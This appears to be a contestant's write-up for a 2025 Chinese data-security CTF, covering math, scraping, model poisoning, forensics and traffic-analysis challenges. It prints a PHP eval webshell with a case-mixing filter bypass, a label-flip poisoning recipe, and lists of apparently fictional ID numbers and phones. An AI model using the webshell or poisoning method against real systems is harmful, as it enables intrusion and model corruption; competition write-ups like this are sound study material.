2025 Digital China Data Security Industry Points Competition: Preliminary Round Writeup

Data Security

AS

import math

def solve_pell(D):
    """Find the fundamental solution of x^2 - D*y^2 = 1 via the continued-fraction expansion of sqrt(D)."""
    sqrtD = math.isqrt(D)
    if sqrtD * sqrtD == D:
        return None  # D is a perfect square: the equation has no solution

    # Standard continued-fraction iteration for sqrt(D)
    m = 0
    d = 1
    a = sqrtD
    num1, num = 1, a
    den1, den = 0, 1

    while num*num - D*den*den != 1:
        m = d * a - m
        d = (D - m*m) // d
        a = (sqrtD + m) // d

        num, num1 = a * num + num1, num
        den, den1 = a * den + den1, den

    return (num, den)

def generate_solutions(D, base_sol):
    """Step through successively larger Pell solutions until the derived values are big enough."""
    x1, y1 = base_sol
    xn, yn = x1, y1

    while True:
        n1 = (xn - 1) // 2
        n2 = yn

        # Both values must exceed 2**5279
        threshold = 1 << 0x149f  # 0x149f == 5279
        if n1 > threshold and n2 > threshold:
            return (n1, n2)

        # Advance to the next larger solution: (xn + yn*sqrt(D)) * (x1 + y1*sqrt(D))
        xn, yn = x1 * xn + D * y1 * yn, x1 * yn + y1 * xn

if __name__ == "__main__":
    D = 8 * 5279  # 42232
    base_sol = solve_pell(D)

    if base_sol:
        x_base, y_base = base_sol
        print(f"Fundamental solution: (k={x_base}, y={y_base})")

        n1, n2 = generate_solutions(D, base_sol)
        print("\nSolutions satisfying the constraints:")
        print(f"n1 = {n1}")
        print(f"n2 = {n2}")
    else:
        print("D is a perfect square; no solution")

ez_upload

The upload endpoint turns out to accept .phtml files,

but the file content may not contain the string "php"; bypass the check with mixed case.

Write a one-liner webshell into the uploaded file, then connect with AntSword (蚁剑).
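
A minimal example of the kind of payload this implies (hypothetical; the exact shell used was not recorded). Only the literal string "php" is filtered, so an upper-case open tag is enough, and the lowercase eval needs no mangling:

<?PHP @eval($_POST["cmd"]); ?>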

The key is sitting right in the www directory.

Model Security

Data Preprocessing

1

Scripts used:

Crawler for the site's review pages:

import requests
from bs4 import BeautifulSoup
import time
import random

def scrape_product_reviews(product_id, file):
    url = f"http://47.117.190.214:32879/index.php?controller=product&action=detail&id={product_id}"

    try:
        # Short random delay (0-0.2 s) between requests to avoid getting blocked
        time.sleep(random.uniform(0, 0.2))

        response = requests.get(url)
        response.raise_for_status()

        soup = BeautifulSoup(response.text, 'html.parser')
        reviews = soup.find_all('div', class_='review-item')

        for review in reviews:
            # Field defaults ("无" = none)
            user_id = "无"
            username = "无"
            phone = "无"
            content = "无"

            # Extract the reviewer info
            user_info = review.find('div', class_='reviewer-info')
            if user_info:
                user_id_tag = user_info.find('span', class_='user-id')
                if user_id_tag:
                    user_id = user_id_tag.text.split(':')[-1].strip()

                username_tag = user_info.find('span', class_='reviewer-name')
                if username_tag:
                    username = username_tag.text.split(':')[-1].strip()

                phone_tag = user_info.find('span', class_='reviewer-phone')
                if phone_tag:
                    phone = phone_tag.text.split(':')[-1].strip()

            # Extract the review body
            content_tag = review.find('div', class_='review-content')
            if content_tag:
                content = content_tag.text.strip()

            # Write one record per review; the Chinese field labels are kept
            # because the downstream parsing scripts match on them
            file.write(
                f"用户ID: {user_id}\n"
                f"用户名: {username}\n"
                f"手机号: {phone}\n"
                f"评论文本: {content}\n"
                f"商品ID: {product_id}\n"
                f"\n{'=' * 30}\n\n"  # record separator
            )

    except Exception as e:
        print(f"Error scraping product {product_id}: {e}")

# Open the output file
with open('product_reviews.txt', 'w', encoding='utf-8') as file:
    # File header (kept in Chinese to match the scraped data)
    file.write("商城用户评价数据\n")
    file.write(f"生成时间: {time.strftime('%Y-%m-%d %H:%M:%S')}\n\n")

    # Crawl product IDs 1-500
    for product_id in range(1, 501):
        print(f"Scraping product ID: {product_id}")
        scrape_product_reviews(product_id, file)

print("Done! Data saved to product_reviews.txt")

Extract the user ID, username, and phone number from product_reviews.txt and compute their MD5 digest:

import hashlib

def generate_md5(input_file, output_file):
    with open(input_file, 'r', encoding='utf-8') as f_in, \
            open(output_file, 'w', encoding='utf-8') as f_out:

        current_entry = {}
        for line in f_in:
            line = line.strip()

            # Record separator: a run of 30 '='
            if line.startswith('=' * 30):
                # Process a complete entry
                if all(key in current_entry for key in ['用户ID', '用户名', '手机号']):
                    # Build the string to hash: ID + username + phone
                    raw_str = f"{current_entry['用户ID']}{current_entry['用户名']}{current_entry['手机号']}"
                    print(raw_str)
                    md5_hash = hashlib.md5(raw_str.encode('utf-8')).hexdigest()
                    # Write "user_id:md5" so the merge script below can pair records
                    f_out.write(f"{current_entry['用户ID']}:{md5_hash}\n")

                current_entry = {}
                continue

            # Parse "key: value" fields
            if ':' in line:
                key, value = line.split(':', 1)
                key = key.strip()
                value = value.strip()
                current_entry[key] = value

if __name__ == "__main__":
    generate_md5('product_reviews.txt', 'md5.txt')
    print("MD5 hashing done; results saved to md5.txt")

Pull each review and its user ID out of product_reviews.txt:

def extract_reviews(input_file, output_file):
    with open(input_file, 'r', encoding='utf-8') as f_in, \
            open(output_file, 'w', encoding='utf-8') as f_out:

        current_entry = {}
        for line in f_in:
            # Strip leading/trailing whitespace
            cleaned_line = line.strip()

            # Record separator: a line of exactly 30 '='
            if cleaned_line == '=' * 30:
                if current_entry.get('用户ID') and current_entry.get('评论文本'):
                    f_out.write(f"{current_entry['用户ID']}:{current_entry['评论文本']}\n")
                current_entry = {}
                continue

            # Parse the user ID
            if cleaned_line.startswith('用户ID:'):
                current_entry['用户ID'] = cleaned_line.split(':', 1)[1].strip()

            # Parse the review text
            if cleaned_line.startswith('评论文本:'):
                current_entry['评论文本'] = cleaned_line.split(':', 1)[1].strip()

if __name__ == "__main__":
    extract_reviews('product_reviews.txt', 'reviews.txt')
    print("Extraction done; results saved to reviews.txt")

The reviews were then handed to an AI (with manual supervision) to decide whether each ID's review is positive, producing review2.txt.

Finally, a script merges the contents of review2.txt and md5.txt into the submission CSV:

import csv
import re

def load_review_data(file_path):
    """Load the review label data (user_id:label lines)."""
    reviews = {}
    with open(file_path, 'r', encoding='utf-8') as f:
        for line_num, line in enumerate(f, 1):
            line = line.strip()
            if not line:
                continue

            # partition() splits only on the first colon
            user_id, sep, label = line.partition(':')
            if not sep:
                print(f"[warn] malformed line {line_num}: {line}")
                continue

            user_id = user_id.strip()
            label = label.strip()

            # Validate the label
            if label not in ('0', '1'):
                print(f"[warn] invalid label on line {line_num}: {label}")
                continue

            reviews[user_id] = label
    return reviews

def load_md5_data(file_path):
    """Load the MD5 signature data (user_id:md5 lines)."""
    md5_pattern = re.compile(r'^[a-f0-9]{32}$')
    signatures = {}
    with open(file_path, 'r', encoding='utf-8') as f:
        for line_num, line in enumerate(f, 1):
            line = line.strip()
            if not line:
                continue

            user_id, sep, md5 = line.partition(':')
            if not sep:
                print(f"[warn] malformed line {line_num}: {line}")
                continue

            user_id = user_id.strip()
            md5 = md5.strip().lower()  # normalize MD5 to lowercase

            # Validate the MD5 format
            if not md5_pattern.match(md5):
                print(f"[warn] invalid MD5 on line {line_num}: {md5}")
                continue

            signatures[user_id] = md5
    return signatures

def generate_csv(reviews, signatures, output_file):
    """Write the final CSV."""
    matched = 0
    missing = []

    with open(output_file, 'w', encoding='utf-8', newline='') as f:
        writer = csv.writer(f)
        writer.writerow(['user_id', 'label', 'signature'])

        for user_id, label in reviews.items():
            if user_id in signatures:
                writer.writerow([user_id, label, signatures[user_id]])
                matched += 1
            else:
                missing.append(user_id)

    # Print statistics
    print(f"Matched records: {matched}")
    if missing:
        print(f"User IDs without an MD5 signature: {len(missing)}")
        print(f"Sample missing IDs: {', '.join(missing[:3])}...")

if __name__ == "__main__":
    # File paths
    REVIEW_FILE = "review2.txt"
    MD5_FILE = "md5.txt"
    OUTPUT_FILE = "result.csv"

    # Load the data
    print("Loading review data...")
    review_data = load_review_data(REVIEW_FILE)
    print(f"Valid review records loaded: {len(review_data)}")

    print("\nLoading MD5 data...")
    md5_data = load_md5_data(MD5_FILE)
    print(f"Valid MD5 records loaded: {len(md5_data)}")

    # Write the merged CSV
    print("\nGenerating merged file...")
    generate_csv(review_data, md5_data, OUTPUT_FILE)
    print(f"\nResults saved to: {OUTPUT_FILE}")

[Feishu attachment placeholder: the embedded result file cannot be displayed outside the original document]

2

Script used:

Crawl each product's feature values with the spider, match up the data, and generate the table:

import requests
import csv
import re
from bs4 import BeautifulSoup

def get_category_id(product_name):
    # Flower products take priority over generic gardening
    if "花卉" in product_name:
        return 23
    if "园艺" in product_name and "花卉" not in product_name:
        return 25

    # Keyword-to-category mapping (some keywords are merely examples)
    mapping = [
        (1, ["手机", "oneplus", "iphone", "oppo", "vivo", "华为"]),
        (2, ["母婴"]),
        (3, ["家居"]),
        (4, ["书", "著作", "物种起源", "达尔文"]),
        (5, ["蔬菜"]),
        (6, ["厨房"]),
        (7, ["办公"]),
        (8, ["水果", "桑葚", "苹果", "香蕉", "橙子"]),
        (9, ["宠物"]),
        (10, ["运动"]),
        (11, ["热水器", "恒温"]),
        (12, ["彩妆"]),
        (13, ["保健品"]),
        (14, ["酒水"]),
        (15, ["玩具"]),
        (16, ["汽车"]),
        (17, ["床上"]),
        (18, ["洗发水", "洗护"]),
        (19, ["五金"]),
        (20, ["户外"]),
        (21, ["珠宝"]),
        (22, ["医疗"]),
        (24, ["游戏"]),
    ]
    name_lower = product_name.lower()
    for cid, keywords in mapping:
        for kw in keywords:
            if kw.lower() in name_lower:
                return cid
    # No match: return 0 for "unknown category"
    return 0

def parse_sales(sales_str):
    """
    Parse a sales string such as "月销量: 720件": extract the number and
    clean the data, returning 0 for negative values.
    """
    match = re.search(r'月销量:\s*(-?\d+)', sales_str)
    if match:
        sales = int(match.group(1))
        return sales if sales > 0 else 0
    return 0

def get_review_count(product_detail_url):
    """
    Fetch the product detail page and count the review items (assumed to
    use the class 'review-item'). Returns 0 on failure or when none are found.
    """
    try:
        resp = requests.get(product_detail_url, timeout=5)
        if resp.status_code != 200:
            return 0
        detail_soup = BeautifulSoup(resp.text, 'html.parser')
        # Adjust the selector to the actual detail-page structure
        review_items = detail_soup.find_all(class_='review-item')
        return len(review_items)
    except Exception as e:
        print(f"Error fetching reviews from {product_detail_url}: {e}")
        return 0

def main():
    base_url = "http://47.117.190.214:32879/index.php?controller=home&action=index&page="
    products = []
    page = 1
    # Keep crawling pages until 500 products are collected or the pages run out
    while len(products) < 500:
        url = base_url + str(page)
        print("Scraping page:", page)
        try:
            resp = requests.get(url, timeout=10)
        except Exception as e:
            print(f"Failed to retrieve page {page}: {e}")
            break
        if resp.status_code != 200:
            print("Failed to retrieve page:", page)
            break
        soup = BeautifulSoup(resp.text, 'html.parser')
        product_cards = soup.find_all(class_="product-card")
        if not product_cards:
            print("No product cards found on page:", page)
            break
        for card in product_cards:
            try:
                product_id_text = card.find(class_="product-id").get_text(strip=True)
                # e.g. "商品ID: 500"
                product_id = int(re.search(r'商品ID:\s*(\d+)', product_id_text).group(1))
                product_name = card.find(class_="product-name").get_text(strip=True)
                sales_text = card.find(class_="product-sales").get_text(strip=True)
                sales = parse_sales(sales_text)
                # Detail-page link, used to count reviews
                product_link = card.find("a", class_="product-link")["href"]
                reviews_number = get_review_count(product_link)
                category_id = get_category_id(product_name)
                products.append({
                    "product_id": product_id,
                    "sales": sales,
                    "category_id": category_id,
                    "reviews_number": reviews_number
                })
                if len(products) >= 500:
                    break
            except Exception as e:
                print(f"Error parsing product card: {e}")
                continue
        page += 1

    # Sort by product ID, ascending
    products = sorted(products, key=lambda x: x["product_id"])

    # Save as a UTF-8 CSV file
    output_file = "submit_2.csv"
    with open(output_file, "w", newline="", encoding="utf-8") as f:
        writer = csv.DictWriter(f, fieldnames=["product_id", "sales", "category_id", "reviews_number"])
        writer.writeheader()
        for prod in products:
            writer.writerow(prod)
    print(f"Finished! {len(products)} products have been saved to {output_file}")

if __name__ == "__main__":
    main()

3

Reuse the crawler script from task 1, then read the data back out of product_reviews.txt.

Extract the phone numbers and save them in masked (desensitized) form:

import re

def process_phone(phone):
    """Mask a phone number, keeping the first 3 and last 4 digits."""
    if len(phone) != 11 or not phone.isdigit():
        return None
    return f"{phone[:3]}****{phone[-4:]}"

def extract_phones(input_file, output_file):
    with open(input_file, 'r', encoding='utf-8') as f_in, \
            open(output_file, 'w', encoding='utf-8') as f_out:

        # Patterns for the fields we need
        id_pattern = re.compile(r'用户ID:\s*(\d+)')
        phone_pattern = re.compile(r'手机号:\s*(\d{11})')

        current_id = None
        current_phone = None

        for line in f_in:
            line = line.strip()

            # Match the user ID
            if id_match := id_pattern.search(line):
                current_id = id_match.group(1)

            # Match the phone number
            elif phone_match := phone_pattern.search(line):
                raw_phone = phone_match.group(1)
                if processed_phone := process_phone(raw_phone):
                    current_phone = processed_phone

            # On a separator line, write out the collected record
            if line.startswith('========'):
                if current_id and current_phone:
                    f_out.write(f"{current_id}:{current_phone}\n")
                # Reset for the next record
                current_id = None
                current_phone = None

if __name__ == "__main__":
    extract_phones('product_reviews.txt', 'phone.txt')
    print("Phone extraction done; results saved to phone.txt")

Then generate the CSV directly; the User-Agent check was handled by manual input.

import csv

def convert_to_csv(input_file, output_file):
    """
    Convert phone.txt into the required CSV format.
    :param input_file: input file name
    :param output_file: output file name
    """
    try:
        with open(input_file, 'r', encoding='utf-8') as f_in, \
                open(output_file, 'w', encoding='utf-8', newline='') as f_out:

            # CSV writer
            writer = csv.writer(f_out)
            # Header row
            writer.writerow(['user_id', 'desensitization'])

            # Data rows
            for line_num, line in enumerate(f_in, 1):
                line = line.strip()
                if not line:
                    continue

                # Split on the colon separator
                if ':' not in line:
                    print(f"Line {line_num} malformed, missing colon separator: {line}")
                    continue

                user_id, desensitization = line.split(':', 1)
                user_id = user_id.strip()
                desensitization = desensitization.strip()

                # Validate the fields
                if not user_id.isdigit():
                    print(f"Line {line_num} has a non-numeric user ID: {user_id}")
                    continue

                if len(desensitization) != 11 or '****' not in desensitization:
                    print(f"Line {line_num} has a malformed masked number: {desensitization}")
                    continue

                # Write the CSV row
                writer.writerow([user_id, desensitization])

    except FileNotFoundError:
        print(f"Error: file {input_file} does not exist")
    except Exception as e:
        print(f"Unexpected error during processing: {str(e)}")

if __name__ == "__main__":
    # Configuration
    INPUT_FILE = "phone.txt"
    OUTPUT_FILE = "phone_data.csv"

    # Run the conversion
    convert_to_csv(INPUT_FILE, OUTPUT_FILE)
    print(f"Conversion done; results saved to {OUTPUT_FILE}")

[Feishu attachment placeholder: the embedded result file cannot be displayed outside the original document]

Model Adversarial Poisoning

1

Analyzing the model and its vectorizer turned up the keywords with the largest influence on the two predicted classes: 垃圾 ("garbage") and 不错 ("decent"). Writing these into the table poisons the data and flips the model's results (CSV data at the end); a sketch of the keyword search follows.
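
A minimal sketch of how such keywords can be located, assuming the target is a scikit-learn vectorizer plus a linear classifier; the file names model.pkl and vectorizer.pkl are hypothetical stand-ins for the challenge artifacts:

import joblib

# Load the challenge artifacts (hypothetical file names)
vectorizer = joblib.load("vectorizer.pkl")
model = joblib.load("model.pkl")

# Pair each vocabulary term with its learned weight
feature_names = vectorizer.get_feature_names_out()
weights = model.coef_[0]

# The largest positive/negative weights belong to the words that push
# the decision hardest in each direction
ranked = sorted(zip(weights, feature_names))
print("strongest negative words:", [w for _, w in ranked[:5]])
print("strongest positive words:", [w for _, w in ranked[-5:]])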

2

Generate at most 100 poisoned samples of at most 20 characters each. The data must attach a negative label to positive wording and a positive label to negative wording, so the generator has to enforce both the label flip and the length limit.

Build positive and negative word banks. The positive bank holds common praise words such as 好, 推荐, 满意; the negative bank holds words such as 差, 失望, 糟糕. The banks should be varied enough to cover many phrasings and strengthen the poisoning effect.

Sample generation: each sample combines one or more keywords, optionally prefixed with an intensifier such as 非常 or 极其, to diversify the data. A helper function randomly combines intensifiers and keywords and checks that each sample stays within 20 characters.

Define the word banks and intensifiers, randomly generate samples, check length, deduplicate, and assign the flipped labels (CSV data at the end); a sketch of such a generator follows.
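
The sketch below implements that plan; the word banks, intensifiers, the output name poison.csv, and the label convention (1 = positive) are assumptions rather than the competition's exact values:

import csv
import random

# Illustrative word banks (assumed, not the exact lists used); each bank must
# offer more modifier+keyword combinations than the number of samples requested
POSITIVE = ["好", "推荐", "满意", "不错", "喜欢", "划算", "好评", "点赞", "完美", "惊喜", "超值", "回购"]
NEGATIVE = ["差", "失望", "糟糕", "垃圾", "难用", "退货", "差评", "坑人", "劣质", "后悔", "骗人", "破烂"]
MODIFIERS = ["", "非常", "极其", "特别", "真的"]

def make_samples(words, label, n, max_len=20):
    """Random modifier+keyword combinations: unique, at most max_len chars, flipped label."""
    samples = set()
    while len(samples) < n:
        text = random.choice(MODIFIERS) + random.choice(words)
        if len(text) <= max_len:
            samples.add(text)
    return [(text, label) for text in samples]

if __name__ == "__main__":
    random.seed(0)
    # Positive wording gets label 0, negative wording gets label 1
    # (assuming the target model uses 1 = positive)
    rows = make_samples(POSITIVE, 0, 50) + make_samples(NEGATIVE, 1, 50)  # 100 rows total
    with open("poison.csv", "w", encoding="utf-8", newline="") as f:
        writer = csv.writer(f)
        writer.writerow(["text", "label"])  # assumed column names
        writer.writerows(rows)
    print("wrote", len(rows), "poisoned samples to poison.csv")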

Data Analysis

Tracing and Forensics

1

Open the image in R-Studio Portable; every file turns out to have been deleted. Recover all of them.

The important file contains hidden text.

2

Analyze the memory dump with Volatility and find TrueCrypt in use. Dump the relevant process memory to recover the key material (Volatility 2's truecryptsummary/truecryptpassphrase plugins cover this, assuming a supported profile), then decrypt and mount the log container, which yields two log files.

3

The log file records a boolean-based blind SQL injection. A successful guess returns a response of length 704, so use awk to extract every line containing 704, then run

awk 'match($0, /select%20id_card%20from%20info%20limit%20([0-9]{1,3}),1\),([0-9]{1,3}),1\)\)=([0-9]{1,3})/, a) {print a[1], a[2], a[3]}' 1.txt | sort -k 1,2 -n | uniq | python 1.py

together with the script below to recover the ID-card numbers (the 3-argument match() in the awk one-liner requires GNU awk):

import sys

# Dynamically growing list of recovered strings
str_list = []

for line in sys.stdin:
    line = line.strip()
    if not line: continue

    try:
        # Parse the three numbers: row offset, character position, ASCII code
        str_pos, char_pos, ascii_code = map(int, line.split())

        # The LIMIT offset is already 0-based; the substring position is 1-based
        list_idx = str_pos
        char_idx = char_pos - 1

        # Decode the ASCII code
        char = chr(ascii_code)

        # Grow the list as needed
        while len(str_list) <= list_idx:
            str_list.append("")  # pad with empty strings

        # Grow the target string as needed
        target_str = list(str_list[list_idx])
        while len(target_str) <= char_idx:
            target_str.append(" ")  # pad with spaces

        # Place the character
        target_str[char_idx] = char
        str_list[list_idx] = "".join(target_str)

    except Exception as e:
        print(f"Error processing: {line} -> {e}", file=sys.stderr)

# Print the results
print("\nFinal string list:")
for idx, s in enumerate(str_list):
    print(f"[String {idx+1}] {s}")

[String 1] 110101199001011234
[String 2] 310115198502021234
[String 3] 440305199503031234
[String 4] 500101200012121234
[String 5] 330106197708081234
[String 6] 210202198609091234
[String 7] 420103199912121234
[String 8] 510104199311111234
[String 9] 230107196504041234
[String 10] 320508200005051234
[String 11] 130104198707071234
[String 12] 410105199206061234
[String 13] 220203198808081234
[String 14] 610112200109091234
[String 15] 340104197612121234
[String 16] 370202199404041234
[String 17] 530102199810101234
[String 18] 450305198303031234
[String 19] 120105197411111234
[String 20] 350203200202021234
[String 21] 430104199707071234

[String 1] WangWei
[String 2] LiNa
[String 3] ZhangQiang
[String 4] ChenFang
[String 5] LiuTao
[String 6] ZhouMin
[String 7] ZhaoGang
[String 8] YangXue
[String 9] HuangLei
[String 10] XuLi
[String 11] SunHao
[String 12] ZhuLin
[String 13] MaChao
[String 14] HeJing
[String 15] GaoFei
[String 16] LinYan
[String 17] GuoYong
[String 18] LuoMin
[String 19] LiangJun
[String 20] SongJia
[String 21] XieFang

Arrange the ID numbers by the first letter of the corresponding name, MD5-hash the concatenation, and submit (a sketch reproducing this step follows the string):

500101200012121234340104197612121234530102199810101234610112200109091234230107196504041234120105197411111234310115198502021234370202199404041234330106197708081234450305198303031234220203198808081234350203200202021234130104198707071234110101199001011234430104199707071234320508200005051234510104199311111234440305199503031234420103199912121234210202198609091234410105199206061234
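
A minimal sketch reproducing the ordering: pair the two recovered lists by index, sort case-insensitively by name ("by first letter"), concatenate the ID numbers, and hash:

import hashlib

# The two index-aligned lists recovered above
ids = [
    "110101199001011234", "310115198502021234", "440305199503031234",
    "500101200012121234", "330106197708081234", "210202198609091234",
    "420103199912121234", "510104199311111234", "230107196504041234",
    "320508200005051234", "130104198707071234", "410105199206061234",
    "220203198808081234", "610112200109091234", "340104197612121234",
    "370202199404041234", "530102199810101234", "450305198303031234",
    "120105197411111234", "350203200202021234", "430104199707071234",
]
names = [
    "WangWei", "LiNa", "ZhangQiang", "ChenFang", "LiuTao", "ZhouMin",
    "ZhaoGang", "YangXue", "HuangLei", "XuLi", "SunHao", "ZhuLin",
    "MaChao", "HeJing", "GaoFei", "LinYan", "GuoYong", "LuoMin",
    "LiangJun", "SongJia", "XieFang",
]

# Case-insensitive sort by name, then concatenate the matching ID numbers
ordered = "".join(i for _, i in sorted(zip(names, ids), key=lambda p: p[0].lower()))
print(ordered)                                    # the string above
print(hashlib.md5(ordered.encode()).hexdigest())  # the submitted hash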

Data Social Engineering

1

Inspect the DiDi ride records in Navicat to get latitude/longitude pairs, then search the coordinates to find the corresponding residential complex; the third location yields the company name.

2

See 3.

3

This yields the phone number, the company name, and the ID-card number.

4

See 3.

5

The phone number 13891889377 was obtained earlier.

Search for it among the car photos: run them all through OCR and Ctrl+F the combined output for the number; it turns up in one of them.

Data Attack and Defense

1

Export the HTTP streams from the pcapng capture and find a blind SQL injection; reconstruct the flag from it by hand.

2

Filter the traffic in Wireshark for POSTs to the upload endpoint (e.g. with a display filter along the lines of http.request.method == "POST" && http.request.uri contains "upload"); two matching packets turn up, and analysis shows the uploaded file name is 2.abc.

3

A script counts how many times each name appears and converts the log automatically:

import re
import json
from collections import defaultdict

def process_log(log_file, output_file):
    # name -> first-seen phone number and occurrence count
    info_dict = defaultdict(lambda: {'phone': '', 'count': 0})

    with open(log_file, 'r', encoding='utf-8') as f:
        content = f.read()

    # Records in the log are separated by runs of '=' characters
    blocks = re.split(r'={5,}\n', content)

    for block in blocks:
        block = block.strip()
        if not block:
            continue
        lines = block.split('\n')
        # Only consider HTTP messages
        if not lines[0].startswith('HTTP/'):
            continue
        try:
            # Headers end at the first empty line; the rest is the body
            header_end = lines.index('')
        except ValueError:
            continue
        body = '\n'.join(lines[header_end+1:])
        try:
            data = json.loads(body)
            name = data.get('name', '')
            phone = data.get('phone', '')
            if name and phone:
                # Keep the first phone seen for a name; count every occurrence
                if info_dict[name]['count'] == 0:
                    info_dict[name]['phone'] = phone
                    info_dict[name]['count'] = 1
                else:
                    info_dict[name]['count'] += 1
        except json.JSONDecodeError:
            continue

    with open(output_file, 'w', encoding='utf-8') as f:
        for name in info_dict:
            if info_dict[name]['count'] > 0:
                line = f"{name} {info_dict[name]['phone']} {info_dict[name]['count']}\n"
                f.write(line)

if __name__ == '__main__':
    process_log('http.log', '1.txt')

Duplicate names appear; manual filtering gives the final answer:

王二蛋,15100266408,1053;石建,18623146812,1047;李二娃,13823137848,1037;
